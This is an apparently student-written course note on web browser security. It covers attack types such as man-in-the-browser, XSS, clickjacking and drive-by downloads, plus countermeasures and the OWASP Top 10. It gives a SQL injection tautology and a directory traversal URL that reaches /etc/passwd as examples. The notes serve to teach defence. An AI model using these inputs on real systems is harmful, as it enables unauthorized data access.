Semester 4 / Operating Systems Security /Web Browsers

Web Browsers

4 min read Updated Fri Apr 24 2026 07:36:29 GMT+0000 (Coordinated Universal Time)
Open in ChatGPT Open in Claude

A software that connects to web servers, retrieves web content, displays it to users, and sends user data back to websites. Main gateway to the internet.

  • Retrieves and renders web pages.
  • Sends user inputs to websites.
  • Used on desktops, laptops, tablets, and mobile devices.
  • Some applications embed browser functionality.

As they are widely used, they are a major target for cyber attacks.

Browsers are a huge security concern because they work with many untrusted sources such as:

  • Webpages can load resources from multiple domains.
  • Browser add-ons may contain malicious code.
  • Some data transfers occur automatically without user awareness.
  • Malicious scripts may execute invisibly to the user.

Browser Vulnerabilities

Weaknesses in browser software or its components that attackers exploit to access data or compromise systems.

  • Browsers are widely used.
  • They process complex content (HTML, scripts, media).
  • They allow extensions and plug-ins.

Browser Attack Vectors

An attack vector is the path or method used by an attacker to exploit a vulnerability.

Common browser attack vectors:

  • Operating system compromise
  • Intercepting browser communication
  • Malicious browser extensions
  • Compromised websites

Browser Attack Types

Man-in-the-Browser (MITB)

Inserts malicious code into the browser to intercept and manipulate communication between the user and a website.

Often installed via plug-ins or malware. Captures login credentials. Can bypass HTTPS protections.

Alters transaction data. Steals authentication information.

Keystroke Logger

Records every key typed on a keyboard. Can be done either through a hardware device (USB dongle) or a software malware. Captures passwords, financial information and all private information.

Not limited to browsers, may affect the entire system.

Page-in-the-Middle

Redirects users to a malicious page while appearing to access the legitimate one. Intercepts user input. Similar to MITB behavior.

Program Download Substitution

An attack where legitimate software downloads are replaced with malware.

User-in-the-Middle

Manipulates users into performing actions for attackers. Clickbait tricks users into solving CAPTCHAs for spammers.

Clickjacking

Tricks users into clicking hidden or disguised interface elements. User unknowingly performs an unintended action.

For example: using a transparent button placed over a legitimate button.

Cross-Site Scripting

Aka. XSS. Attacker injects malicious scripts (through malicious browser extensions, or non-validated user inputs) into web pages that execute in the user’s browser.

Can be used to hijack sessions, steal cookies or manipulate page’s content.

Web Bug / Tracking Pixel

A small invisible image used to monitor user activity on websites or emails.

Tracks page views. Collects user behavior data.

Drive-By Download

A drive-by download installs malicious software automatically when a user visits a webpage. No explicit user permission required. Often triggered through scripts or vulnerabilities.

SQL Injection

When malicious SQL commands are inserted into database queries.

Normal query:

SELECT * FROM trans WHERE acct='2468';

Malicious query:

SELECT * FROM trans WHERE acct='2468' OR '1'='1';

Access to sensitive database records. Solution is to normalize the user input before using it in a query.

Directory Traversal

Directory traversal uses sequences like ../ to access restricted files on a server.

Example:

http://example.com/../../etc/passwd

Server-Side Include Injection

An attack that injects server commands into pages processed by server-side include scripts.

Can be used to execute unintended server commands. Accesses protected resources.

Countermeasures

  • Consider all inputs as untrusted.
  • Validate all inputs (in both client-side and server-side).
  • Sanitize special characters.
  • Use parameterized queries.
  • Apply strict backend access control.

OWASP Top 10

Open Web Application Security Project (aka. OWASP) lists the most critical web application security risks.

  1. Broken Access Control
  2. Cryptographic Failures
  3. Injection
  4. Insecure Design
  5. Security Misconfiguration
  6. Vulnerable Components
  7. Authentication Failures
  8. Software/Data Integrity Failures
  9. Logging and Monitoring Failures
  10. Server-Side Request Forgery (SSRF)